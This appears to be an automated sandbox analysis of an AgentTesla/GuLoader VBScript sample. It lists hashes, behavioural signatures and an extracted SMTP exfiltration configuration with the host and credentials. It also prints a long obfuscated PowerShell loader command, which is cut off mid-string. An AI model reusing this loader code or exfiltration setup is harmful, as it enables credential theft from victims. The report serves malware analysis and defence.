Analysis
-
max time kernel
86s -
max time network
143s -
platform
windows7_x64 -
resource
win7-20221111-en -
resource tags
arch:x64arch:x86image:win7-20221111-enlocale:en-usos:windows7-x64system -
submitted
25-12-2022 11:12
Static task
static1
Behavioral task
behavioral1
Sample
MY03352Q1171700MYKUL.vbs
Resource
win7-20221111-en
Behavioral task
behavioral2
Sample
MY03352Q1171700MYKUL.vbs
Resource
win10-20220901-en
Behavioral task
behavioral3
Sample
MY03352Q1171700MYKUL.vbs
Resource
win10v2004-20220812-en
General
-
Target
MY03352Q1171700MYKUL.vbs
-
Size
309KB
-
MD5
11a5f3f7ad7592dc17d89d1b59600fa8
-
SHA1
2000b5828e0e9b100d297df5ef4673ea02578dcd
-
SHA256
7d4c2032e6d7079d67fc996c9039282a63112bdb95ac675d3d96c6ae9bec3daa
-
SHA512
a9ffabe48cc16c3801afcf6b8aae96c3c0ea140933a37cb015a7305ffd27bc78d540dc86d596ca9516fa00e664628cf0348dc5e264fd55aa1bb4791afc6a400f
-
SSDEEP
6144:PQDNmkBwc8OdK9XoCwguzSCBJnuZ79qfC7gxNZ7kRnbv6j96fL3Wc/div5i9K3mY:PQhzBwc8OdK9XonguzSCBJuZ79qfC7gz
Malware Config
Extracted
agenttesla
Protocol: smtp- Host:
mail.masonadventures.com - Port:
587 - Username:
[email protected] - Password:
PUh/f9ES(7,av{ZL;F - Email To:
[email protected]
Signatures
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
-
Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
-
Checks QEMU agent file 2 TTPs 2 IoCs
Checks presence of QEMU agent, possibly to detect virtualization.
Processes:
powershell.execaspol.exedescription ioc process File opened (read-only) C:\Program Files\Qemu-ga\qemu-ga.exe powershell.exe File opened (read-only) C:\Program Files\Qemu-ga\qemu-ga.exe caspol.exe -
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
Processes:
caspol.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 caspol.exe Key opened \REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 caspol.exe Key opened \REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 caspol.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
Processes:
caspol.exepid process 336 caspol.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
Processes:
powershell.execaspol.exepid process 516 powershell.exe 336 caspol.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.exedescription pid process target process PID 516 set thread context of 336 516 powershell.exe caspol.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 5 IoCs
Processes:
powershell.exepowershell.execaspol.exepid process 1132 powershell.exe 516 powershell.exe 336 caspol.exe 336 caspol.exe 336 caspol.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
Processes:
powershell.exepid process 516 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
powershell.exepowershell.execaspol.exedescription pid process Token: SeDebugPrivilege 1132 powershell.exe Token: SeDebugPrivilege 516 powershell.exe Token: SeDebugPrivilege 336 caspol.exe -
Suspicious use of WriteProcessMemory 15 IoCs
Processes:
WScript.exepowershell.exepowershell.exedescription pid process target process PID 1720 wrote to memory of 1100 1720 WScript.exe cmd.exe PID 1720 wrote to memory of 1100 1720 WScript.exe cmd.exe PID 1720 wrote to memory of 1100 1720 WScript.exe cmd.exe PID 1720 wrote to memory of 1132 1720 WScript.exe powershell.exe PID 1720 wrote to memory of 1132 1720 WScript.exe powershell.exe PID 1720 wrote to memory of 1132 1720 WScript.exe powershell.exe PID 1132 wrote to memory of 516 1132 powershell.exe powershell.exe PID 1132 wrote to memory of 516 1132 powershell.exe powershell.exe PID 1132 wrote to memory of 516 1132 powershell.exe powershell.exe PID 1132 wrote to memory of 516 1132 powershell.exe powershell.exe PID 516 wrote to memory of 336 516 powershell.exe caspol.exe PID 516 wrote to memory of 336 516 powershell.exe caspol.exe PID 516 wrote to memory of 336 516 powershell.exe caspol.exe PID 516 wrote to memory of 336 516 powershell.exe caspol.exe PID 516 wrote to memory of 336 516 powershell.exe caspol.exe -
outlook_office_path 1 IoCs
Processes:
caspol.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 caspol.exe -
outlook_win_path 1 IoCs
Processes:
caspol.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 caspol.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\MY03352Q1171700MYKUL.vbs"1⤵
- Suspicious use of WriteProcessMemory
PID:1720 -
C:\Windows\System32\cmd.execmd /c echo REG_SZ2⤵PID:1100
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Plenisms = """MaxFUnduFisnSkycSeltViniJudoSubnmar RhaZChreFornTalbDifuAttdQuadBjehanaiChasArbmminethrsInd0Ost0Imp exp{RenpBilaUdarUndaAdvmCho(Loe[EnpSClitVelrhybiDronDevgGar]Ang`$GaeBCaueArbtHaloForkBrdeTllnCommHereFornWartDianCasdTinvBlaiopslPenlFlyiLocgHineCystQua)Sst;PotFLegoTakrUbe(Hal`$RadBConeEtatsiboMulkCapeComnChimBeleBarnLadtKis=Kri3Gas;gvt Pop`$DagBUrneBoktBrkoAchkDecedounUnfmAfmePapnDletRes pud-CirlMartAuk Dag`$SemBUdseElvtPoroKadkSejejvnnsanmGifeetinEurtAffnToddArrvStyiDillKlolUniisalgVareIkktPro.tilLStreKalnIllgSpitFerhSyl-Que1Bre;Lom Mys`$MatBAileRhetVenoOpmkSpiePolnInvmToieUndnKilttel+Car=bic(Sla3Tea+Ufo1Fas)Afv)Nel{Def`$BryFRajoTierArraPrunLassFlltKonaTamltentUtrnVetiGeanBargStueUndrMol Alv=Cor Fod`$BedFJfroOutrFiraTelnIstssaatdepaAnglHostAlunForiStrnDefgPareUnvrMon Opa+Kiw Naa`$TunBIsoeNoltImpoConkMeteCornMalmNjaestanHjrtEctnSeedFarvDuniFerlPoslStriIndgCrueAcrthaa.DerSGoduCitbSmisCoptExtrRoeiAspnDuxgOsm(Non`$FyrBUmreFejtTreoReekflaeFetnAfsmGeneElvnSoutTje,Lev Cor1Snd)Kar;Reg}For`$FalFMinoLykrDiaaGrunstisTertGabaTrvlklytPeanEliiWaynMamgSomeKitrRev;Lsn}Paa`$unrZRemeHypnMudbSlauInddDrydMnshResiFinsOrdmVineKrasInd0Var2Com Cha=Smr UndZBagebadnTysbStauKlodRvrdRvthoveiJussUremDogeSkrsBen0Ste0Bow Cir'LavPbilajarrJenIPilSQuilKuwaFinnLigrStaeViesUdtvFraWBerhEngoCeroBoitOraaTakmscukConSHjhnTysoRaneJvnTEvnrLekvGua-EnhSSupnDraeFlaEBulHUnruStrrSolxThiPGosrRelsUndpBygVDagiaveslevrPerAImmfChegSubeIncFWarudobzTotsRhiFAttrNoneGrosRumiIdenFaldJibiLseSShakFaiylreoMutUPernFordbelnfrefunguUdgltrs Sta'Unw;num`$AffZbryeMernDiabBesuTemdBurdMuzhPoliLeusFlomForeDatsSkr0Klo1Lam bog=Opt OveZSvaeFalnExpbGoauLevdUfodTyvhSnkiSnasDiamKoneSanstil0Ikr0Skr Unm'LanBSelaAntkIns`$AtmHBogigridDepBOveCSkraDisuProlgisPTjeaSaurResaHemSLarrBrolChozMisRRdkiPumdTitoLanHNyceellmDignNonsStrpsteuForefraUIntnPlarUdvrascGUlmeMilrDiasFilEsmotDatiKoo[FolKSyriSbesAga`$CotStabnKavdAfgBstrMAalaGronGameKomPScyaNonrUndtDisPireelyzrPsioDepNPaueTraaDekkMarlkonoFrogdokeThuABarbFeroElinMisPExrigalgLacmspuSProtMageUdmeCouODervZygeDdsnSinTBryarulrlevtEgriGranKattKho/RegKSkyodoklPol2MinPCinlEtaaOut]EdgTBreeHalrImm BliWForiCaftAtt=WhiEKvanBacsbet RemAstedDetvBut[SouHKuloTerrStucGstNGeneduaxAproLimOPauuOuttOtonBeeSLighKvieindvBilUCladPsekDoneTreCdkkeSubnRemrraaCAltoSpnlSnotResMCanaFaanPla]RefSEphnEpieGar:SloACrefDemsAnt:HorKDraaArtlbesTfirSGedtCobrSpeoDovtUnsaSpnlConBOveKUdfnParhWreyGraeMinnPsetIbetSkaDOcyeOyvsMuseVioTbriialieIpi(ResAMerntontTow`$AnabPlaeOrghRecBTaeMKobeOpstHeleUdsPSemeVagrFrgtSkdSsiptObsrpyooHieATolcLaroTrakBipDVanoSalpWineSkiSChruAnibPasnredSToktCogiPetmMerDDomoFormSleeNemKStootrgnKonnNikUVranRevcLiktLadRDivginfsGlonSkrfundeSadsFordSpokGranVediAspvCrecFisoMegnSaciGolTDatrOppeLivlEcoSLetaAgalThrlTwiaAlknRoltRaiiSydIPaanEnttDidgGonGhybuCladBuneintGoveeFlonUnttEunKTocrAfkyCha.MrbAKidnStiaKatScarCTimoForrDatuBroCKuilUndaBesbRisQSeauTilaStusHalGWooiminrMilttarNNateCamdprarFruAMisfLevlMatiSmaCAlflPreeNonnDagSLngaUbenDebgFotDKonopsegDis(PhoBSteaSejsPer`$BriSOvepUdlrMohBWeaRSubsForoReleOrdUDatlLejsMortmouBBaseunonopkoSmaPEryrpaloTeakLupUParnBasbReieBracRaroKaluVennMilEBiorFreoAlbmTriGInduBurlNoneElePStorBefeLutnLeaaScrmGrumGsttmesmResaBunnBul,NonbNoteSkogGte DryTsigaSigpDon2KryLTroyAnddRou)FaiBInslOveiFin,BinFAmpoAlcrFor AllHSkrjHareMil1LivLAlcaGlstSta6AntIPlixSamoBat)DreIOffsDecopur Avi'Meg;HolFPeluNonnScocSentTeaiAbboHypnfun PreHLukTReiBPil Byr{AfppDayaDeprTagaovemInn(Myc[MetSorntTearDipiParnIdegOmk]Cuv`$AnlBFiseFontLigoComkSnieTranHjamPapeLignUnatPornKlkdLenvForiHuslFeclBudiWhegBooeUvstDdv)fos;Klo`$VaaBVrelDagaCapzKkkoSojnIrieProrMogsudv Res=Dum ejeNKoneAfswExa-JubOMyobUnhjZiaePancSkitOut TrabGruyStutHypeRak[Col]Slu com(ang`$SupBBileFortGraoUdpkTabeChonHexmUdeeDagnFortWapnSekdSkrvBrniStolOvelNihiSpigBameBectRan.UdeLSpoeSumnSpigWobtInshine Fri/Phl Pla2Arg)Phi;EksFCanoReprafn(raj`$DirBForeEnttErooCatkKaleHelnschmAcieaflnSvatWhi=Dys0Fou;Cap Eht`$KorBMeseKaftBogohockSupeSumnDismPaleFornMastFre Pro-ElilsamtScr Tek`$JonBBarePartModoFrokUdeevamnnormMoreByrnSwatBounMardOutvIndiKoslBorlUdbiPregBiteFoutHaa.SlaLtenecarnSnugAgrtDryhIrr;Sub kry`$KloBForeScetStaobegkjoseIiwnvalmBypeAflnReatStu+Con=Mil2For)Mar{for.Skn(reo`$ansZposeSponBilbLykuUnrdPordKilhEksiLotsAfsmLemeColsAtm0Kon2Rik)Tet Sam`$SemZCafeblanSombHyluFoldUfrdTeihDepiSelsUtamJvneFrusLum0Ind1Odd;Ter`$SalBMerlOveaSprzHetoAarnunaeElersubspas[Imp`$KalBOpseSeatDukoTabkChreUnanMedmSvreColnRuntKao/Gal2Fal]Orn Goa=Mil Mem(Eja`$PraBandlFodaSlazImmoBudnClueHebrMoosDyr[Eth`$JerBBaseDoltlasoPalkCykePesnVitmPleeNonnShatNeb/Min2Str]Bra eva-illbBuexKmpoRigrTwi Und2Pib2Fre7Kla)Fle;And}Mam[PygSsqutSvarSkyiAttnForgCha]fly[BleSMazyTrisDyrtAfgeAftmOli.PicTHaneFabxVeltBet.MetENonnSvicMusoProdWiliDisnsupgNed]Hur:Sti:FriAJagSSprCUpaIKruISta.FarGReteStatManSGibtParrLaniTrenClogAab(Her`$TurBDivlsplaSlazNonoGifnTypeforrBodsTak)Dec;Unv}Res`$IsmVUdsaPreeMcdrFeskUdveHelrFil0Kis=StaHKreTAmpBAci toi'BerBNav0Dro9CalAClo9Sub0Kon9Kam7Spr8Con6All8DiaEAmmCGreDori8Koj7Tve8JouFTor8OesFPil'Vsk;sko`$forVpilaSmaeKafrOppkKlueSourErk1Sen=baaHzooTSnaBKuv Fir'BelAIsoEmee8semAWat8Ove0Per9Beb1Uns8AsoCHel9ski0Vap8AveCCen8Bel5Laz9Ado7GelCherDGynBVdd4Unm8tyrAVak8SupDModDPre0torDGar1OpiCRecDAboBLan6Arb8PreDFot9Hal0Ect8Amp2Sid8Tob5tun8Bil6AguAStuDKra8Byt2Gen9Opt7Def8SjuAMed9Prs5Uni8Aut6CopAAerEKom8Men6non9Ter7Ste8ManBSva8TruCLop8Cel7Cry9Soj0Tor'Msk;Epo`$ZonVWamaMiceTllrCrokfieeBeerDoc2Wri=PatHTecTCalBPer Fla'AfsASpe4fla8Rav6Int9Par7PavBBla3Der9Vid1Ren8DorCThr8Dra0KapAAdj2Ski8Snu7aku8Tip7Try9Fry1Fac8War6Pol9App0sup9Ree0Fas'Neu;Kam`$PetVSteaForeExerParkSagebaarInc3Ung=FigHWorTUnwBEks Skj'SilBHaw0Too9SchARoe9Pet0Una9Bef7Ste8Ben6Sle8UdvEBarCPocDMedBFin1Mis9Roo6Gle8UnsDfor9cas7Inf8CarAAur8MelECot8Udf6VenCAbrDcivACocAPag8JobDVel9Bel7Mon8Mar6Ant9Laf1svo8KomCTol9Mul3PriBRep0Chi8Pro6Asc9Kor1mod9Dyt5Kar8RegAAdr8Pur0Vis8Fig6int9Tee0LeoCSamDTelAUnsBGaz8Sie2Sep8RovDUnl8Bes7Lux8GruFOrn8pro6OpsBUbe1Whi8Afv6Sub8Kal5Ijo'Non;Bla`$AfhVHosaCudeProrFemkUdseBrkrFli4Reg=SelHFinTUdtBPla Ove'Non9Iod0Udg9And7afl9Kom1Dun8PimAPat8BloDUne8Atr4Ple'Aci;Cra`$WisVUntaEnkeHumrStekUnheTwerLmm5drf=ResHSpiTNonBove Mal'MetARev4Non8Tre6Rem9gar7EnsACagEBeg8PosCOku8sup7Uds9Svr6Pro8FolFSol8Coc6blaANeuBAcc8Afd2Gru8PerDsto8Ree7Sta8QuiFpun8Che6Gen'Men;Mat`$RanVDreaAdseSlurLetkKalePenrBig6Ref=CloHOrnTVanBInt Ber'EndBUnf1PanBSte7StrBYde0stt9Gua3Fir8Ben6Day8Cir0Gre8griASpr8Oks2Sum8StiFHefACheDTrs8Cou2For8SupEReu8Ask6lilCRumFAttCBla3uplAtilBmea8TakAchr8Det7Mbe8Str6FraAGor1Unb9MotATraBKap0Imp8KafAMan8Ras4RefCIndFBruCUnr3CivBFla3Ska9Sub6Afl8Nem1Het8ScuFTry8Ib Apse8Chl0Mer'Kin;Skk`$ForVDelaBemeGeprEndkPoreUngrHet7Ord=PreHmelTKonBSub Mor'BenBVas1Afl9Ant6Spo8HemDKil9bet7Ela8AltAAld8BesEDaa8Exi6RafCSkoFDenCCat3OprASteERet8Svb2Und8PriDAro8fre2Vam8Out4Epe8Org6Kom8Ste7Sna'Ans;Syg`$TidVUnraBeleRonrSyvkUbeeKlernab8Und=bagHIllTAugBFla Uro'BruBCur1Non8Hul6Flo8Mun5Usu8ProFPet8Jai6Cou8Bru0Und9Sat7Mus8Fri6Dor8Alg7UnaAPoi7Jvn8toi6Tru8GenFWat8Und6Syn8Nit4Liq8Bro2Fgt9Neu7Lob8Pri6Hyp'Loe;Fug`$SkvVCheaBeveAntrOffkAnteTunrSer9Duv=HylHAraTForBLis Kil'CroATemAFla8appDIrwAMtaEReg8Jud6sor8SkaECop8AviCAfl9Caf1For9HirAPolAFrsEClo8ErhCMar8But7Nep9Fri6pue8KinFfde8Sup6Gal'Lit;Dre`$GenDUngoLitcNedhSkrtEkveLejrSta0Ing=strHkonTParBPta Klb'ForABatEstr9PedAUdvAGla7Myr8Smi6Spr8PraFIna8Unv6Tem8Ynk4Vul8Hin2Und9kic7Led8Shi6ThiBTva7Abi9ChoASag9Bro3Bru8Ind6Sri'Sag;Mon`$ActDDawoDrucoffhChitTraeIntrAcr1Ant=SkeHTurTMutBspe Sla'RebADec0Und8NegFUnr8Fri2Ude9Frp0Non9Nec0ForCCanFOrpCGla3ShiBSpa3Unb9Spg6Udk8Ind1Vic8BloFMoo8DisAIns8Bro0ForCSnbFMelCAfo3SunBVar0Paa8kil6Kas8Bot2Dop8SkgFSub8Kom6Oms8par7BygCDojFHonCUnd3HovARya2Bal8TheDpos9Spy0Cut8AkkAArbAmud0Met8DisFTel8vit2Vdd9Rub0Sly9Udd0SafCPerFSteCMid3OrlAArk2hal9Vel6Int9Con7Opn8LufCGebANot0Uds8SalFAut8Dac2Spo9Uns0Ved9Dee0App'Pen;Par`$SexDGruoVancChehBaltAidesesrPos2Sku=SerHOpsTAfvBtje Ove'mesAOsoASur8FulDUnm9Pre5dri8StaCSou8Pal8byg8Arv6Eta'Sti;Agg`$shaDTipoMaxcValhKeytConeKofrTri3Amb=KokHSamTGriBMes Com'uncBPre3upt9bot6Ses8ban1sap8JosFKom8DicAHae8Dra0IntCdeuFDelCRer3PicAPheBSla8TeaAHei8Hns7Gui8Rek6BarAOpg1Tek9AfdATidBDis0Arb8EleABad8Por4ForCAssFForCSka3CasALkkDRur8Ane6car9Unn4BeeBHou0Wel8MitFGla8ProCGru9Sym7BagCNonFMasCRen3SkeBDri5Nav8sufAAfl9Skn1Ned9Tun7Ple9App6Bus8gen2Tin8GriFFle'Ejl;bur`$SjlDFasoBjrcAnghGaitDaneDaprNev4Dea=TieHSkiTIndBVed Ove'TaiBFid5Til8KliAHyd9Omv1gri9Fas7Mat9Bel6Not8Hyp2Aft8DobFNedALta2Hea8sidFRen8AntFobs8PluCNaa8Sul0Bor'Boh;Pro`$PleDKuloConcFrehQuatFyreBalrbow5Gar=MorHSubTSkoBUng Upl'Fib8SolDBog9Byu7Gei8Kni7Sta8DatFMeg8eddFThe'Udy;Shu`$flyDPoloForcTimhOndtOuteAfsrVol6Kaf=PerHBowTRedBNdr Sta'HidAkagDFug9Ant7SkrBTva3Bad9Kna1Tit8TipCSka9Spe7Svi8Liv6Reg8Fac0Tek9Ido7RudBKon5lon8NidAUns9Tri1Wis9Bos7Eff9Cha6lov8Und2Hen8kmpFMemAPeaEFor8Dog6Bar8stuETri8HapCTag9Tar1lys9RevAJor'Afg;Bur`$UnpDHeloFutcMethBestForeCovrNon7Cou=MarHSemTUndBRes Pla'FisAGafAScoASty6patBGyrBPrs'Cha;Ste`$CenDUtooComcBeihLnftSteeCinrBae8Tan=telHSelTBanBAbo Duc'BetBSelFKur'Bio;AumfLaculannTemcBrytSamiPaloamfnCol PalfSankDalpApo Rab{ThePStoaRntrKrnaLazmQue run(Geu`$SucSFacpSproVelrskiaBrodSusiglunInt,Afm Mes`$EddGintaJacsUnctSplnKirdSvieVrarForeBim)zin Hyd Mis pas Uns Non;Hyp`$cariAandForigeoosvatFiliFodsFramMuk0kin Omb=FemHPhaTGenBPul Coo'KliCOve7BayBThe6Man8spr7Sta9Aut5Man8ForAPen8Tal7Kom8Reg6Ste8CarFBal9pap0Lov8Pro6Kor8TjeDNonCCom3SteDEupEeucCSma3KraCKulBProBTra8FliABnk2Epi9Jag3del9Til3MosAAjl7afs8MisCHyp8BelEhar8Rel2Bnk8modAStr8VngDTilBBevEHawDJum9JomDInt9CorASap0Lau9Hyr6Ree9Sup1tel9par1Ene8Shr6Nde8ProDAmp9Fal7curASem7Foc8SgeCSid8DecEAdj8Eks2Pre8TodAPen8TinDKarCNorDDecABer4Kit8Sti6Int9Nor7taiABef2Hom9Bis0Hof9Wea0Shu8Uds6Str8SkjETem8Bla1Lip8PerFHaa8forAOve8Adm6Ber9Tri0juxCTwiBBodCKraAStaCRod3Tre9VinFRidCIll3tetBDes4Orp8CheBMan8Gip6Ale9Pre1Fin8Agr6EstCTesEFinAProCFis8pan1Pen8Fel9Irr8Sen6Kri8Mud0Bet9Nun7UreCPse3Oxy9Fly8DdsCArc3NytCPaa7AgrBRulCNonCSpaDFaaABel4Rad8OveFEng8IndCMou8For1Pam8Sad2Inc8WitFAanATid2pen9Aut0Pal9Krs0Soa8Lin6Mic8bosEOve8Imp1Amp8HypFInd9GenAComAAsy0Dru8For2Gra8Lia0Yde8BunBCoc8Fnu6tilCimi3TriCUnfESkrAFor2Ink8sprDGeo8Ope7PetCTal3AkvCBer7AsiBArcCCatCLigDFisAKleFOpp8ZarCSup8Sam0Gin8Fld2Bub9Ads7Hje8LoaAEdd8KunCDis8LanDbraCdisDJorBVeg0Abr9Gla3Mut8GenFAfv8helAInt9Ele7CysCpalBNonCUti7UdlAFor7Sst8EskCSha8Dri0App8MisBMat9Cyn7Non8Tva6Pep9Kvi1ungDUfoBIndCBioAEddBInt8BesCOomEAnaDOpb2HarBEftEIntCFilDUtnAWhy6Loy9Exi2Fol9Tri6Mer8Sya2Taa8pusFKno9Dur0ToxCMelBFroCBal7tagBFas5Out8Tra2Fam8Ver6For9Und1hap8Ele8rem8wor6Ufa9For1EpiDFre3SnoCVenAIapCMon3Svi9CicEPreCSvmAAktCEksDRadAsyn4Kee8Dri6Sis9Ady7YawBPho7Sin9MunATan9Gli3Aru8Agi6EroCdrtBjukCSkr7GroBFor5Del8Imp2Obt8thr6gen9Bes1Sta8Spd8Klo8Bor6Ops9Pre1BloDPre2HebCHanAAme'war;Lor&Kon(Und`$AdmDRitoProcVirhRedtFlaeDkkrBrs7Cac)Brn Reg`$HldiUnidArmiMatozootAfsiCarsNovmEns0Tar;sem`$BasiPotdMariAnnoMuntTryiSkosMarmGlo5Gli Eth=Non couHRaiTMasBpal loc'PlaCRad7VolBGri3Bun9Dac1Fam8Lir6Ple8Paa2Une8UnfFgja8ApaFSes8ColCRet8int0Ned8Fas2Tra9mus7Int8Bre6Dis9Equ0PyrDEks2fesDSem5TraDKli2SilCLys3KviDUndETonCSoa3OxlCCer7KrfBHel6Tru8Unh7The9Gis5Ape8AfsADen8Hun7Uri8Ist6Oct8FreFGra9Abs0Ski8Kam6Str8RepDPaaCHjeDEftAOve4Peg8Int6Jug9Kyl7RacAPhiEAtt8Ans6Sam9Til7Sur8BryBJug8CarCBet8Und7BagCLumBIndCSat7KerBsan5Pro8Per2Pen8Ant6Kam9And1Sub8Apo8Hvd8Dys6Utu9fys1zelDVan1FemCUncFBacCPit3ResBUnd8TudBYan7Fus9BleABru9Civ3Cho8sag6BomBCin8UndBPreEMonBbibEAldCPli3AskABug3GasCEndBUnfCNon7stiBHon5Lin8ade2Gst8Ove6Afp9Exs1Flo8Age8Int8Sim6Gin9Ven1ValDAnl0aliCTjrFBgeCAft3ScaCBra7DouBBdl5Fro8Spo2Rac8Unc6Smr9Ser1Pir8Rig8Ind8Hjr6Wiv9Kal1EclDSty7bevCSawAPaaCSelAFra'Fig;Mou&Afp(Fri`$KabDLdeoBoicSolhAuttjoreFrerHot7Tur)For Fes`$UnpiBrodSkristuoStitPariNossRommsej5Slg;Ant`$PooiFladForiStaoPottSeriDkssKrimSpa1cad Vel=Hal NonHSviTRemBIle Tun'Pre9udf1Udf8Kil6Sce9Sub7Sji9Ace6Svi9rvr1Den8KhaDAndCHee3PhiCFib7UnsBDis3Amp9Fah1Pre8Wam6Blo8Tal2ens8CheFAnt8FibFUni8UncCLon8Ind0Reu8Luf2Sic9Rea7Ste8Sko6Lym9Itu0SanDTre2KedDans5KlaDFol2PasCSpeDConASubAbis8OrtDryg9Iri5Ply8FdeCOar8bat8For8Meg6SwaCEftBBesCRum7Art8PeaDSpi9Set6Sla8FejFTan8RatFUenCdruFEngCAma3AfvAcon3CreCTypBQuaBKon8proBRec0Eff9dobAPse9Ado0Env9Mas7Pho8Voc6Akv8DolEStaCSelDencBTra1Ort9Spe6Omn8UnlDMys9Pes7Iri8bunAFrs8DecEHje8Oli6perCDifDrapAUncAWhe8NovDLan9Pro7Nar8Alb6Sho9Arr1Mou8ManCKat9Ins3BndBVer0Try8Erh6Isb9Syc1pro9Sty5Pre8AssAAnt8Bre0ind8Bal6Tri9Vor0LufCFanDSidACoaBSpo8Vel2Sal8NonDMon8arv7Kin8TraFben8Alb6FarBOpt1hen8Met6Str8Com5CunBkopEBehCMerBMelAHorDDrm8fre6Hal9Jag4BacCAntEMinAAusCSav8Gan1Pud8Zoo9Dih8Pio6Hyd8Acq0Eve9ste7PauCPju3VarBMit0Deb9StuARek9fly0Res9Sbe7Ant8Mot6Ynd8MarEAssCRekDMulBSjl1Aut9Bet6Bes8SubDSam9Rec7Oxy8PenAOpv8IndERyg8Dol6NepCAfrDAcaAEdhATan8lgeDUba9Lum7Hal8For6Mus9Lyk1Gal8TriCris9Pri3OveBEnz0Eft8Dis6Adv9Tre1Bou9Und5Tan8QuiASag8Bla0The8San6Sna9Hal0konCsymDregAPhaBbri8Hel2uan8OphDamp8Aff7Fje8flyFKar8Rel6pseBFan1Nod8Mou6sin8Sav5AnaCPreBPanCDelBSarAimpDTan8Dec6Uni9Tip4UlyCAntEFriASmiCCor8Hun1Thr8Hoo9Trs8Bes6Sam8Fed0Rei9Fru7SkoCPho3AlvAFreAPal8TilDCog9Ann7licBAdf3Bra9Lok7Nat9Pos1AntCBunAshaCFabFBalCRuf3HypCVerBProCHnn7KroBIsn6Erh8Lns7Ulr9Cyc5trr8ChaAInt8Sys7Spa8Rej6Kar8RufFSce9Can0Bag8Cre6Cor8CypDTjaCPapDPopAStr4Sko8Vip6Fre9Tej7RneASygETil8Kog6Ani9Inv7scr8PhyBDis8CorCVal8Pro7FleCravBMixCOps7BftBHal5Dis8Out2Dag8Ege6All9Jus1Tre8Slg8Bjr8Haa6Rom9Sta1HenDcaj6eksCrayAkonCAfiAExeCVanDKatAJerABig8PutDUdl9Tva5Bom8FreCBel8Sar8Cap8Sar6AffCOveBRapCFor7Bes8HinDUns9Ops6Aft8AmeFSto8TinFArbCScfFSmaCRho3VenABac3TheCSkuBkleCSlr7OctBDem0Sko9Tin3Uns8OmeCSkn9Tor1Bek8Pol2Syn8Jam7Dre8IsoAper8AgiDmakCCalAKenCTelASkaCAdrASasCStiAEmiCUnpFUdsCNsk3TryCDol7AsfATac4Gav8Cyk2sub9Hin0Non9Ska7Kon8MorDLot8Brs7str8kle6Ast9Opk1Pro8Fre6GroCComAFusCdemATel'For;Han&fal(Sta`$oozDInvoSelcDechTrotWaleSnorBaa7Kan)Baf Aph`$OliiGiudDiriElsoUndtadjiOstsEtamFor1Rec;Wir}BaifDenuPalnStecKeetTyviCoaoKatnRad UnpGScoDKamTOve Mil{ScrPTryaTjerOveaGifmFun Kan(Ves[IdiPMooaAfvrKviaRelmCateHattStaesubrGen(OptPWoooPresdeniBantCariStuoCohnRug Our=Kot Ben0syg,Snr UdgMVaraTutnMildLevaKontForoArnrtrayCle Pre=Nel Soy`$DraTAzurChauHobeBjr)Tab]Agg Cle[UnsTfisyJebpCeneRer[syn]Tim]Man bul`$NysSEmiaPretlediMensJanftagaPercOratHjeoLnsrPosiPronRageRatsKursGen,Cry[afkPSpiaNexrEliaHeamSmreAvatAppeBanrPur(ValPbanoCamsOneiThitoutiParoLsrnGan Loc=Sno Amb1bis)Dea]Gra Non[TilTPlayMadpThieSal]Fin Nei`$FejFMegrEthdScriStrgDotgMusrAfseTralJersRumePen Uni=Her Ent[UndVSeaoRutiSagdAfs]Vak)End;Uns`$PjaiRapdSeciNewoSintLitiRkksHanmSop2Yel Non=Haa NorHGjaTBraBUnh Dam'KonCPag7FjeASyn0Cad8GluCKlu8IndEDep8JouAKou8For0Abe9Ove1ter9SekAUtiCOve3DueDUnvEBjrCLiv3KvaBFan8NonANon2Jag9duk3Jov9Gra3AdoAGaz7Pap8TjeCafg8PlaEFog8Spi2Sup8CarAUnp8lovDSkeBFriEFarDfod9DokDHks9TarASid0Cam9Opt6Bev9Fuc1Com9Mor1Cha8Str6Kns8TeaDArk9Pen7TraAHaa7Fyr8LisCSti8BliESpi8Het2Rea8BegAsae8zacDKalCSkuDKonALic7Pre8Sne6Kan8Squ5Imp8SveAPri8LanDSkr8Bis6ExtAKjo7Ver9TyvAPla8KlaDPro8Cah2Ara8SkaEUnc8UndACon8Adi0IchAVlg2Pal9Ski0Fra9Sta0ini8Upc6Rec8ChiEFor8Psa1Per8SipFEks9polADdsCMarBMisCFifBHemABesDAno8Bla6den9Sti4canCIncELgeASweCDru8Uni1Opr8Sti9For8Yel6Ter8Eft0Kin9Hys7RhiCUdl3HypBCac0Bel9BodAAnb9Fyr0mem9Vra7For8Unc6fil8TidERdsCTorDDelBSim1Stt8Epi6Asc8Jap5pyx8CacFTyp8Fes6ove8Tim0Pin9Ste7Nyt8NedASch8hapCPib8FliDVibCTitDUrbACon2Bri9Jaq0Spe9dis0raa8Nor6Fes8FemEins8Til1Unt8RepFPit9anlAUnaAFrmDTra8Col2Sti8spaEDis8Cyc6KvaCKanBOrdCAde7KipBSpa5S